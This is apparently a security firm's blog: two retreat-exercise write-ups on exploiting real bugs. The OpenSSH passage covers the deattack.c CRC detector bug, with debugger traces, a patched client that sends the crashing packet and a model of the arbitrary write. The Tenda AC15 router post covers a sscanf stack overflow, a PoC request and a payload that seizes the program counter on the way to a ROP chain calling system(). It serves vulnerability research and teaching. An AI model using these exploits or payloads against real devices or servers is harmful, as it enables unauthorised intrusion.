Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x0000000100003954 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAA....
   179          for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180                  ;
   181
-> 182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
Target 0: (a.out) stopped.
(lldb) p/x l
(u_int32_t) 0x00010000
(lldb) p/x l & 0xffff
(u_int32_t) 0x00000000
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003970 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAA...
   180                  ;
   181
   182          if (h == NULL) {
-> 183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003974 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAA...
   181
   182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
-> 184                  n = l;
   185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
   187                  if (l > n) {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003980 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
   182          if (h == NULL) {
   183                  debug("Installing crc compensation attack detector.");
   184                  n = l;
-> 185                  h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186          } else {
   187                  if (l > n) {
   188                          n = l;
Target 0: (a.out) stopped.
(lldb) p/x n
(u_int16_t) 0x0000

The last line above shows that n is 0 just after n = l. The reason this is important quickly becomes apparent if we continue execution.

(lldb) c
Process 7691 resuming
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x600082d68282)
    frame #0: 0x0000000100003c78 a.out`detect_attack(buf="AAAAA...
   215                  h[HASH(IV) & (n - 1)] = HASH_IV;
   216
   217          for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
-> 218                  for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
   219                       i = (i + 1) & (n - 1)) {
   220                          if (h[i] == HASH_IV) {
   221                                  if (!CMP(c, IV)) {
Target 0: (a.out) stopped.
(lldb) p/x i
(u_int32_t) 0x41414141
(lldb) p/x h[i]
error: Couldn't apply expression side effects : Couldn't dematerialize a result variable: couldn't read its memory

We got a crash showing our injected As as 0x41414141.

Just as we pass some nice islands.

The crash

The crash occurs because the check h[0x41414141] != HASH_UNUSED ([0] below) hit invalid memory.

From: src/deattack.c:135 - 153

	for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
		for (i = HASH(c) & (n - 1); h[i] /*<- [0]*/ != HASH_UNUSED;
		     i = (i + 1) & (n - 1)) {
			if (h[i] == HASH_IV) {
				if (!CMP(c, IV)) {
					if (check_crc(c, buf, len, IV))
						return (DEATTACK_DETECTED);
					else
						break;
				}
			} else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
				if (check_crc(c, buf, len, IV))
					return (DEATTACK_DETECTED);
				else
					break;
			}
		}
		h[i] = j; // [1] arbitrary write!!!
	}

What if h[i] was a readable offset? After some checks we would hit [1], where h[i] = j. Notice that j is the number of iterations of the outer loop, which we control through our buffer length, and i is our 0x41414141, which we also control. So we end up with a write-what-where primitive in a loop.
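Why does i come straight from our buffer? With n equal to 0, the mask n - 1 evaluates to -1, so the & no longer clips the hash to the table size. The Python sketch below models that. It assumes HASH() reads the first four bytes of each block as a big-endian integer, that int is 32 bits wide, and that every probed slot is unused (so the inner loop exits immediately); planned_writes is a hypothetical helper, not code from OpenSSH.

```python
import struct

SSH_BLOCKSIZE = 8


def index_mask(n: int) -> int:
    # n is promoted to int before the subtraction, so n == 0 yields -1,
    # which becomes 0xFFFFFFFF once combined with the 32-bit hash.
    return (n - 1) & 0xFFFFFFFF


def planned_writes(buf: bytes, n: int) -> list[tuple[int, int]]:
    """List the (index into h, value) pairs the outer loop would write."""
    mask = index_mask(n)
    writes = []
    for j in range(len(buf) // SSH_BLOCKSIZE):
        block = buf[j * SSH_BLOCKSIZE:(j + 1) * SSH_BLOCKSIZE]
        (hashed,) = struct.unpack(">I", block[:4])  # assumed HASH(): 32-bit big-endian
        writes.append((hashed & mask, j & 0xFFFF))  # h[i] = j, stored as 16 bits
    return writes


print(hex(index_mask(0x1000)))  # 0xfff: indexes stay inside the table
print(hex(index_mask(0)))       # 0xffffffff: any 32-bit index is accepted
print([(hex(i), j) for i, j in planned_writes(b"A" * 16, 0)])
# [('0x41414141', 0), ('0x41414141', 1)]
```

Each tuple is one 16-bit store: the first element is chosen by the bytes we put in the block, the second by the block's position in the buffer.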

Crashing the real thing!

At this point we had a working OpenSSH server nicely set up. We need to send our buffer through SSH protocol 1. We couldn’t find an SSH python client that worked with such an outdated broken protocol. The intended solution was to patch out the OpenSSH crypto stuff to make it an easy socket connection. Instead we patched the OpenSSH client that came with the source code. It seems that the real exploit authors might have taken a similar approach.

Finding the patch location was easy with a little trick. Use gdb to break on the vulnerable detect_attack in the SSH server application. Then use gdb to debug the client connecting to the server. The server hangs on the breakpoint, causing the client to hang, waiting on a response to a packet. Ctrl+C in the client and we are at the response handler for the first vulnerable packet sent to the server. As a result we made the following patch.

From: sshconnect1.c:873 - 890

	{
		// DOYENSEC
		// Builds a packet to exploit server
		packet_start(SSH_MSG_IGNORE); // Should do nothing
		int dsize = 0x15560 - 0x10; // -0x10 b/c they add crc for us
		char *buf = malloc (dsize);
		memset(buf, 'A', dsize - 1);
		buf[dsize - 1] = '\x00'; // last valid index, buf[dsize] would be out of bounds
		packet_put_string(buf, dsize);
		packet_send();
		packet_write_wait();
	}

	/* Send the name of the user to log in as on the server. */
	packet_start(SSH_CMSG_USER);
	packet_put_string(server_user, strlen(server_user));
	packet_send();
	packet_write_wait();

Running this patched client got the same crash as in the case of main.c.

Where to go now…

It is important to understand this exploit primitive has a lot of weaknesses.

The h buffer is a u_int16_t *. So, on a little-endian system, you can’t write an arbitrary value to (char *)h + 0 unless you set the upper bits of j. To be able to set all the upper bits of j, you need to be able to loop 0x10000 times.

From: src/deattack.c:135

	for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {

The loop goes over 8 (SSH_BLOCKSIZE) bytes at a time to increment j once. We need a buffer of size 0x80000 to do that. The following check restricts us to write only half of all possible j values.

From: src/deattack.c:93 - 96

	if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // len > 0x40000
	    len % SSH_BLOCKSIZE != 0) {
		fatal("detect_attack: bad length %d", len);
	}
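The numbers behind that restriction are quick to check. This is plain arithmetic in Python, assuming SSH_MAXBLOCKS is 32 * 1024 so that the limit matches the 0x40000 in the comment above.

```python
SSH_BLOCKSIZE = 8
SSH_MAXBLOCKS = 32 * 1024  # assumption: chosen to match the 0x40000 limit

max_len = SSH_MAXBLOCKS * SSH_BLOCKSIZE   # largest len the check accepts
needed_len = 0x10000 * SSH_BLOCKSIZE      # len required to walk j over 16 bits
max_j = max_len // SSH_BLOCKSIZE - 1      # j starts at 0, one step per block

print(hex(max_len))     # 0x40000
print(hex(needed_len))  # 0x80000
print(hex(max_j))       # 0x7fff, so the top bit of a written value is never set
```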

Further, if you want to write the same value to two locations, you have to call the vulnerable function twice without crashing. But once you caused the static n to be 0, it stays 0 on the next re-entry. This will cause the l bit shifting loop to loop infinitely. No matter how much it tries, bit shifting 0 won’t make it big enough to handle your buffer length. You could bypass this by using your arbitrary write to set n to any value that has a single bit set (i.e., 0x1, 0x2, 0x4…). If you use any other values (i.e., 0x3), then the math for the loop may come out differently.
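A small Python experiment illustrates both points, under the same assumptions as before (HASH_FACTOR as x*3/2, 8-byte blocks). The iteration cap only exists so the model can report a loop that would otherwise spin forever, and both function names are ours.

```python
def sizing_loop_terminates(n: int, length: int, max_iterations: int = 64) -> bool:
    """Replay the `l = l << 2` loop, giving up after max_iterations shifts."""
    limit = (length // 8) * 3 // 2
    l = n
    for _ in range(max_iterations):
        if not l < limit:
            return True
        l = (l << 2) & 0xFFFFFFFF
    return False


def index_mask(n: int) -> int:
    # Same promotion rule as in the C code: n - 1 is computed as an int.
    return (n - 1) & 0xFFFFFFFF


print(sizing_loop_terminates(0, 0x15560))  # False: shifting 0 stays 0
print(sizing_loop_terminates(4, 0x15560))  # True
print(bin(index_mask(4)))                  # 0b11: a contiguous mask
print(bin(index_mask(3)))                  # 0b10: only odd-looking indexes survive
```

One way to read the last two lines: a single-bit n keeps n - 1 a contiguous bit mask, which is what the hash-table indexing expects, while other values make the index arithmetic behave differently.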

None of this even accounts for the challenges awaiting outside the detect_attack function. If the checksum fails, do you lose your session? What happens if the ciphertext, your buffer, fails to decrypt?

This all has an influence on what route you want to take to RCE. Trinity’s exploit overwrote the root password with a new arbitrary string. Maybe this was done by pointing the logger at /etc/passwd? Is there an advantage in this over shell code? What about breaking the authentication flow and just flipping an “is authenticated” bit from false to true? Could you overwrite a client public key in memory to have an RSA exponent of 0? So many fun options to try. Can you make an exploit that bypasses ASLR?

Conclusion

Our goal was to crash a patched OpenSSH. We exceeded our own expectations given the time and resources available, crashing, with control, an unpatched OpenSSH. This is due to teamwork and creative time savers during the process of exploitation. There was a ton of theory crafting throughout the process that helped us avoid time sinks. Most of all, there was a lot of fun.

!exploitable Episode One - Breaking IoT

2025-02-11T00:00:00+01:00

Introduction

For our last company retreat, the Doyensec team went on a cruise along the coasts of the Mediterranean Sea. As amazing as each stop was, us being geeks, we had to break the monotony of daily pool parties with some much-needed hacking sessions. Luca and John, our chiefs, came to the rescue with three challenges chosen to make us scratch our heads to get to a solution. The goal of each challenge was to analyze a real-world vulnerability with no known exploits and try to make one ourselves. The vulnerabilities were of three different categories: IoT, web, and binary exploitation; so we all chose which one we wanted to deal with, split into teams, and started working on it.

The name of this whole group activity was “!exploitable”. For those of you who don’t know what that is (I didn’t), it’s referring to an extension made by Microsoft for the WinDbg debugger. Using the !exploitable command, the debugger would analyze the state of the program and tell you what kind of vulnerability was there and if it looked exploitable.

As you may have guessed from the title, this first post is about the IoT challenge.

The Bug

The vulnerability we were tasked to investigate is a buffer overflow in the firmware of the Tenda AC15 router, known as CVE-2024-2850. The advisory also links to a markdown file on GitHub with more details and a simple proof of concept. While the repo has been taken down, the Wayback Machine archived the page.

The GitHub doc describes the vulnerability as a stack-based buffer overflow and says that the vulnerability can be triggered from the urls parameter of the /goform/saveParentControlInfo endpoint (part of the router’s control panel API). However, right off the bat, we notice some inconsistencies in the advisory. For starters, the attached screenshots clearly show that the urls parameter’s contents are copied into a buffer (v18) which was allocated with malloc, therefore the overflow should happen on the heap, not on the stack.

The page also includes a very simple proof of concept which is meant to crash the application by simply sending a request with a large payload. However, we find another inconsistency here, as the parameter used in the PoC is simply called u, instead of urls as described in the advisory text.

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/saveParentControlInfo"
payload = b"a"*1000

data = {"u": payload}
response = requests.post(url, data=data)
print(response.text)

These contradictions may very well be just copy-paste issues, so we didn’t really think about it too much. Moreover, if you do a quick Google search, you will find out that there is no shortage of bugs on this firmware and, more broadly, on Tenda routers – so we weren’t worried.

The Setup

The first step was to get a working setup to run the vulnerable firmware. Normally, you would need to fetch the firmware, extract the binary, and emulate it using QEMU (NB: not including a million troubleshooting steps in the middle). But we were on a ship, with a very intermittent Internet connection, and there was no way we could have gotten everything working without StackOverflow.

Luckily, there is an amazing project called EMUX that is built for vulnerability exploitation exercises, exactly what we needed. Simply put, EMUX runs QEMU in a Docker container. The amazing part is that it already includes many vulnerable ARM and MIPS firmwares (including the Tenda AC15 one); it also takes care of networking, patching the binary for specific hardware checks, and many tools (such as GDB with GEF) are preinstalled, which is very convenient. If you are interested in how the Tenda AC15 was emulated, you can find a blog post from the tool’s author here.

After following the simple setup steps on EMUX’s README page, we were presented with the router’s control panel exposed on 127.0.0.1:20080 (the password is ringzer0).

From the name of the vulnerable endpoint, we can infer that the affected functionality has something to do with parental controls. Therefore, we log in to the control panel, click on the “Parental Control” item on the sidebar, and try to create a new parental control rule. Here is what the form looks like from the web interface:

And here’s the request sent to the API, confirming our suspicion that this is where the vulnerability is triggered:

POST /goform/saveParentControlInfo HTTP/1.1
Host: 127.0.0.1:20080
Content-Length: 154
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: password=ce80adc6ed1ab2b7f2c85b5fdcd8babcrlscvb
Connection: keep-alive

deviceId=de:ad:be:ef:13:37&deviceName=test&enable=1&time=19:00-21:00&url_enable=1&urls=google.com&day=1,1,1,1,1,1,1&limit_type=0

As expected, the proof of concept from the original advisory did not work out of the box. Firstly, because apparently the affected endpoint is only accessible after authentication, and then because the u parameter was indeed incorrect. After we added an authentication step to the script and fixed the parameter name, we indeed got a crash. After manually “fuzzing” the request a bit and checking the app’s behavior, we decided it was time to try and hook GDB to the server process to get more insights on the crashes.
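For reference, the corrected request can be sketched with nothing but Python's standard library. This is an illustration, not our actual script: build_overflow_request is a hypothetical helper, the form fields are copied from the captured request above, and obtaining the password cookie (the authentication step) is left out, so its value is a placeholder. The request is only constructed here, not sent.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_overflow_request(host: str, session_cookie: str, payload_len: int) -> Request:
    """Build (but do not send) the parental control request with an oversized urls field."""
    fields = {
        "deviceId": "de:ad:be:ef:13:37",
        "deviceName": "test",
        "enable": "1",
        "time": "19:00-21:00",
        "url_enable": "1",
        "urls": "a" * payload_len,  # the parameter named in the advisory text
        "day": "1,1,1,1,1,1,1",
        "limit_type": "0",
    }
    return Request(
        f"http://{host}/goform/saveParentControlInfo",
        data=urlencode(fields).encode(),
        headers={
            # Placeholder: the real value comes from logging in to the panel.
            "Cookie": f"password={session_cookie}",
            "X-Requested-With": "XMLHttpRequest",
        },
        method="POST",
    )


req = build_overflow_request("127.0.0.1:20080", "<cookie-from-login>", 1000)
print(req.get_method(), req.full_url, len(req.data))
```

Passing the object to urllib.request.urlopen would send it; the payload length of 1000 is simply the value used by the original PoC.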

Through EMUX, we spawned a shell in the emulated system and used ps to check what was running on the OS, which was actually not much (omitting some irrelevant/repeated processes for clarity):

  698 root       0:02 {run-init} /bin/bash ./run-init
 1518 root       0:00 {emuxinit} /bin/sh /.emux/emuxinit
 1548 root       0:58 cfmd
 1549 root       0:00 udevd
 1550 root       0:00 logserver
 1566 root       0:00 nginx: master process nginx -p /var/nginx
 1568 root       0:00 nginx: worker process
 1569 root       0:00 /usr/bin/app_data_center
 1570 root       0:16 moniter
 1573 root       0:00 telnetd
 1942 root       0:02 cfmd
 1944 root       0:23 netctrl
 1945 root       2:00 time_check
 1947 root       1:48 multiWAN
 1950 root       0:01 time_check
 1953 root       0:04 ucloud_v2 -l 4
 1959 root       0:00 business_proc -l 4
 1977 root       0:02 netctrl
 2064 root       0:09 dnrd -a 192.168.100.2 -t 3 -M 600 --cache=2000:4000 -b -R /etc/dnrd -r 3 -s 8.8.8.8
 2068 root       0:00 business_proc -l 4
 2087 root       0:01 dhttpd
 2244 root       0:01 multiWAN
 2348 root       0:03 miniupnpd -f /etc/miniupnpd.config
 4670 root       0:00 /usr/sbin/dropbear -p 22222 -R
 4671 root       0:00 -sh
 4966 root       0:07 sntp 1 17 86400 50 time.windows.com
 7382 root       0:11 httpd
 8820 root       0:00 {run-binsh} /bin/bash ./run-binsh
 8844 root       0:00 {emuxshell} /bin/sh /.emux/emuxshell
 8845 root       0:00 /bin/sh
 9008 root       0:00 /bin/sh -c sleep 40; /root/test-eth0.sh >/dev/null 2>&1
 9107 root       0:00 ps

The process list didn’t show anything too interesting. There is a dropbear SSH server, but it is actually started by EMUX to communicate between the host and the emulated system, and it’s not part of the original firmware. A telnetd server is also running, which is common for routers. The httpd process seemed to be what we had been looking for; netstat confirmed that httpd is the process listening on port 80.

tcp   0   0 0.0.0.0:9000        0.0.0.0:*  LISTEN  1953/ucloud_v2
tcp   0   0 0.0.0.0:22222       0.0.0.0:*  LISTEN  665/dropbear
tcp   0   0 192.168.100.2:80    0.0.0.0:*  LISTEN  7382/httpd
tcp   0   0 172.27.175.218:80   0.0.0.0:*  LISTEN  2087/dhttpd
tcp   0   0 127.0.0.1:10002     0.0.0.0:*  LISTEN  1953/ucloud_v2
tcp   0   0 127.0.0.1:10003     0.0.0.0:*  LISTEN  1953/ucloud_v2
tcp   0   0 0.0.0.0:10004       0.0.0.0:*  LISTEN  1954/business_proc
tcp   0   0 0.0.0.0:8180        0.0.0.0:*  LISTEN  1566/nginx
tcp   0   0 0.0.0.0:5500        0.0.0.0:*  LISTEN  2348/miniupnpd
tcp   0   0 127.0.0.1:8188      0.0.0.0:*  LISTEN  1569/app_data_cente
tcp   0   0 :::22222            :::*       LISTEN  665/dropbear
tcp   0   0 :::23               :::*       LISTEN  1573/telnetd

At this point, we just needed to attach GDB to it. We spent more time than I care to admit building a cross-toolchain, compiling GDB, and figuring out how to attach to it from our M1 Macs. Don’t do this; just read the manual instead. If we had, we would have discovered that GDB is already included in the container.

To access it, simply execute the ./emux-docker-shell script and run the emuxgdb command followed by the process you want to attach to. There are also other useful tools available, such as emuxps and emuxmaps.

Analyzing the crashes with GDB helped us get a rough idea of what was happening, but nowhere near a “let’s make an exploit” level. We confirmed that the saveParentControlInfo function was definitely vulnerable and we agreed that it was time to decompile the function to better understand what was going on.

The Investigation

The Binary

To start our investigation, we extracted the httpd binary from the emulated system. After the first launch, the router’s filesystem is extracted in /emux/AC15/squashfs-root, therefore you can simply copy the binary over with docker cp emux-docker:/emux/AC15/squashfs-root/bin/httpd ..

Once copied, we checked the binary’s security flags with pwntools’ checksec:

[*] 'httpd'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

Here is a breakdown of what these mean:

NX (No eXecute) is the only applied mitigation; it means code cannot be executed from some memory areas, such as the stack or the heap. This effectively prevents us from dumping some shellcode into a buffer and jumping into it.
RELRO (Read-Only Relocation) makes some memory areas read-only instead, such as the Global Offset Table (GOT). The GOT stores the addresses of dynamically linked functions. When RELRO is not enabled, an arbitrary write primitive could allow an attacker to replace the address of a function in the GOT with an arbitrary one and redirect the execution when the hijacked function is called.
A stack canary is a random value placed on the stack right before the final return pointer. The program will check that the stack canary is correct before returning, effectively preventing stack overflows from rewriting the return pointer, unless you are able to leak the canary value using a different vulnerability.
PIE (Position Independent Executable) means that the binary itself can be loaded anywhere in memory, and its base address will be chosen randomly every time it is launched. Therefore, a “No PIE” binary is always loaded at the same address, 0x8000 in this case. Note that this only applies to the binary itself, while the addresses of other segments such as shared libraries and stack/heap will still be randomized if ASLR is activated.
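To make the breakdown above more concrete, here is a minimal sketch of how three of these flags can be read straight from the ELF headers. It is not how pwntools implements checksec; the function name checksec_elf32 is ours, it only handles little-endian ELF32 files, it reports RELRO merely as "segment present or not", and it skips canary detection (which requires a symbol lookup).

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header describing stack permissions
PT_GNU_RELRO = 0x6474E552   # program header marking the read-only-after-relocation region
PF_X = 0x1                  # "executable" permission bit in p_flags
ET_DYN = 3                  # e_type used by position-independent executables


def checksec_elf32(data: bytes) -> dict:
    """Report PIE, NX and RELRO presence for a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not a little-endian ELF32 file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)

    nx = False      # assumption: no PT_GNU_STACK header is treated as "NX off"
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, off)
        (p_flags,) = struct.unpack_from("<I", data, off + 24)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}
```

Running it as checksec_elf32(open("httpd", "rb").read()) on the extracted binary should agree with the checksec output above, assuming the file is a regular ARM ELF32 executable.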

Regarding ASLR, we checked if it was enabled by running cat /proc/sys/kernel/randomize_va_space on the emulated system and the result was 0 (i.e., disabled). We are not sure whether ASLR is enabled on the real device or not, but, given the little time available, we decided to just use this to our advantage.
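For reference, the value in that file can take three settings. The small helper below is a sketch (the names are ours) that maps the raw value to its meaning as described in the Linux kernel documentation.

```python
ASLR_MODES = {
    0: "disabled",
    1: "partial: stack, mmap base, shared libraries and vDSO are randomized",
    2: "full: everything in mode 1 plus the heap (brk)",
}


def describe_aslr(raw: str) -> str:
    """Translate the content of randomize_va_space into a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")


def read_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the setting from a Linux system (only works where the file exists)."""
    with open(path) as fh:
        return describe_aslr(fh.read())
```

On the emulated router, describe_aslr("0") is the case we hit.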

Because practically all mitigations were deactivated, we had no limitations on which exploit technique to use.

The Function

We fired up Ghidra and spent some time trying to understand the code, while fixing the names and types of variables and functions with the hope of getting a better picture of what the function did. Luckily we did, and here’s a recap of what the function does:

Allocates all the stack variables and buffers

int iVar1;
byte bVar2;
bool bVar3;
char time_to [32];
char time_from [32];
int rule_index;
char acStack_394 [128];
int id_list [30];
byte parsed_days [8];
undefined parent_control_id [512];
undefined auStack_94 [64];
byte *rule_buffer;
byte *deviceId_buffer;
char *deviceName_param;
char *limit_type_param;
char *connectType_param;
char *block_param;
char *day_param;
char *urls_param;
char *url_enable_param;
char *time_param;
char *enable_param;
char *deviceId_param;
undefined4 local_24;
undefined4 local_20;
int count;
int rule_id;
int i;

Reads the body parameters into separate heap-allocated buffers:

deviceId_param = readBodyParam(client,"deviceId","");
enable_param = readBodyParam(client,"enable","");
time_param = readBodyParam(client,"time","");
url_enable_param = readBodyParam(client,"url_enable","");
urls_param = readBodyParam(client,"urls","");
day_param = readBodyParam(client,"day","");
block_param = readBodyParam(client,"block","");
connectType_param = readBodyParam(client,"connectType","");
limit_type_param = readBodyParam(client,"limit_type","1");
deviceName_param = readBodyParam(client,"deviceName","");

Saves the device’s name and MAC address

if (*deviceName_param != '\0') {
  setDeviceName(deviceName_param,deviceId_param);
}

Splits the time parameter in time_to and time_from

if (*time_param != '\0') {
 for (int i = 0; i < 32; i++) {
     time_from[i] = '\0';
     time_to[i] = '\0';
 }

 sscanf(time_param,"%[^-]-%s",time_from,time_to);
 iVar1 = strcmp(time_from,time_to);
 if (iVar1 == 0) {
     writeResponseText(client, "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
     writeResponseText(client,"{\"errCode\":%d}",1);
     writeResponseStatusCode(client,200);
     return;
 }
}

Allocates some buffers in the heap for parsing and storing the parent control rule
Parses the other body fields – mostly just calls to strcpy and atoi – and stores the result in a big heap buffer
Performs some sanity checks (e.g., rule already exists, max number of rules reached) and saves the rule
Sends the HTTP response
Returns

You can find the full decompiled function in our GitHub repository.

Unfortunately, this analysis confirmed what we suspected all along. The urls parameter is always copied between heap-allocated buffers, therefore this vulnerability is actually a heap overflow. Due to the limited time and a very poor Internet connection, we decided to just change the target and try to exploit a different bug.

An interesting piece of code that instantly caught our eye was the snippet pasted in step 4, where the time parameter is split into two values. This parameter is supposed to be a time range, such as 19:00-21:00, but the function needs the raw start and end times, therefore it needs to split it on the - character. To do so, the program calls sscanf with the format string "%[^-]-%s". The %[^-] part will match from the start of the string up to a hyphen (-), while %s will stop as soon as a whitespace character is found (both will stop at a null byte).

The interesting part is that time_from and time_to are both allocated on the stack with a size of 32 bytes each, as you can see from step 1 above. time_from seemed the perfect target to overflow, since it does not have the whitespace characters limitation; the only “prohibited” bytes in a payload would be null (\x00) and the hyphen (\x2D).
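To illustrate the parsing behavior described above, here is a rough Python emulation of that sscanf call. It is only an approximation written for this post (the function name is ours), and it obviously has no notion of buffer sizes: it simply shows which bytes each conversion would hand to time_from and time_to.

```python
WHITESPACE = b" \t\n\v\f\r"


def emulate_time_sscanf(raw: bytes):
    """Approximate sscanf(raw, "%[^-]-%s", time_from, time_to)."""
    raw = raw.split(b"\x00", 1)[0]            # a C string ends at the first NUL
    dash = raw.find(b"-")
    time_from = raw if dash == -1 else raw[:dash]
    if not time_from:                         # %[^-] must match at least one byte
        return None, None
    if dash == -1:                            # the literal '-' cannot be matched
        return time_from, None
    rest = raw[dash + 1:].lstrip(WHITESPACE)  # %s skips leading whitespace
    end = next((i for i, b in enumerate(rest) if b in WHITESPACE), len(rest))
    return time_from, (rest[:end] or None)


time_from, time_to = emulate_time_sscanf(b"A" * 100 + b"-1")
print(len(time_from), time_to)  # 100 bytes headed for a 32-byte stack buffer
```

Since nothing in the format string limits the field width, every byte before the hyphen ends up in time_from, spaces included.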

The Exploit

The strategy for the exploit was to implement a simple ROP chain to call system() and execute a shell command. For the uninitiated, ROP stands for Return-Oriented Programming and consists of writing a bunch of return pointers and data in the stack to make the program jump somewhere in memory and run small snippets of instructions (called gadgets) borrowed from other functions, before reaching a new return instruction and again jumping somewhere else, repeating the pattern until the chain is complete.

To start, we simply sent a bunch of As in the time parameter followed by -1 (to populate time_to) and observed the crash in GDB:

Program received signal SIGSEGV, Segmentation fault.
0x4024050c in strcpy () from target:/emux/AC15/squashfs-root/lib/libc.so.0
────────────────────────────────────────────────────────────────────────────────
$r0  : 0x001251ba  →  0x00000000
$r1  : 0x41414141 ("AAAA"?)
$r2  : 0x001251ba  →  0x00000000
$r3  : 0x001251ba  →  0x00000000
[...]

We indeed got a SEGFAULT, but in strcpy? Indeed, if we again check the variables allocated in step 1, time_from comes before all the char* variables pointing to where the other parameters are stored. When we overwrite time_from, these pointers will lead to an invalid memory address; therefore, when the program tries to parse them in step 6, we get a segmentation fault before we reach our sweet return instruction.

The solution for this issue was pretty straightforward: instead of spamming As, we can fill the gap with a valid pointer to a string, any string. Unfortunately, we can’t supply addresses from the main binary’s memory, since its base address is 0x8000 and, when converted to a 32-bit pointer, it will always have a null byte at the beginning, which will stop sscanf from parsing the remaining payload. Let’s abuse the fact that ASLR is disabled and supply a string directly from the stack instead; the address of time_to seemed the perfect choice:

it comes before time_from, so it won’t get overwritten during the overflow
we can set it to a single digit, such as 1, and it will be valid when parsed as a string, integer, or boolean
being only a single byte we are sure we are not overflowing any other buffer
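A quick way to vet candidate addresses against the two “prohibited” bytes is sketched below. The helper name is ours; the addresses are the ones that appear in this post.

```python
import struct

BAD_BYTES = b"\x00-"   # NUL ends the string, '-' ends the %[^-] conversion


def bad_bytes_in(addr: int) -> bytes:
    """Return the prohibited bytes found in the little-endian encoding of addr."""
    packed = struct.pack("<I", addr)
    return bytes(b for b in packed if b in BAD_BYTES)


for addr in (0x0002E450, 0xBEFFF510):
    print(hex(addr), "usable" if not bad_bytes_in(addr) else "contains bad bytes")
```

Any address inside the main binary fails the check because of its zero top byte, while the stack address of time_to passes.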

Using GDB, we could see that time_to was consistently allocated at address 0xbefff510. After some trial and error, we found a good amount of padding that would let us reach the return without causing any crashes in the middle of the function:

timeto_addr = p32(0xbefff510)
payload = b"A"*880
payload += timeto_addr * 17
payload += b"BBBB"

And, checking out the crash in GDB, we could see that we successfully controlled the program counter!

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
────────────────────────────────────────────────────────────────────────────────
$r0  : 0x108
$r1  : 0x0011fdd8  →  0x00120ee8  →  0x0011dc40  →  0x00000000
$r2  : 0x0011fdd8  →  0x00120ee8  →  0x0011dc40  →  0x00000000
$r3  : 0x77777777 ("wwww"?)
$r4  : 0xbefff510  →  0x00000000
$r5  : 0x00123230  →  "/goform/saveParentControlInfo"
$r6  : 0x1
$r7  : 0xbefffdd1  →  "httpd"
$r8  : 0x0000ec50  →  0xe1a0c00d
$r9  : 0x0002e450  →   push {r4,  r11,  lr}
$r10 : 0xbefffc28  →  0x00000000
$r11 : 0xbefff510  →  0x00000000
$r12 : 0x400dcedc  →  0x400d2a50  →  <__pthread_unlock+0> mov r3,  r0
$sp  : 0xbefff8d8  →  0x00000000
$lr  : 0x00010944  →   str r0,  [r11,  #-20]	; 0xffffffec
$pc  : 0x42424242 ("BBBB"?)
$cpsr: [negative zero CARRY overflow interrupt fast thumb]
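We found the padding by trial and error, but a unique pattern is a common alternative for locating offsets. The sketch below is not what we used during the challenge: it is a small Metasploit-style pattern generator (the function names are ours) that only emits letters and digits, so it contains neither null bytes nor hyphens. On this target a plain pattern would still crash inside strcpy first, but the register value at that crash would at least tell which offset overlaps the first pointer.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested pattern is longer than 20280 bytes")


def pattern_offset(value: int, length: int) -> int:
    """Find where a 32-bit little-endian register value sits in the pattern."""
    return pattern_create(length).find(struct.pack("<I", value))
```

For comparison, the return pointer in our final payload sits at offset 880 + 17 * 4 = 948.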

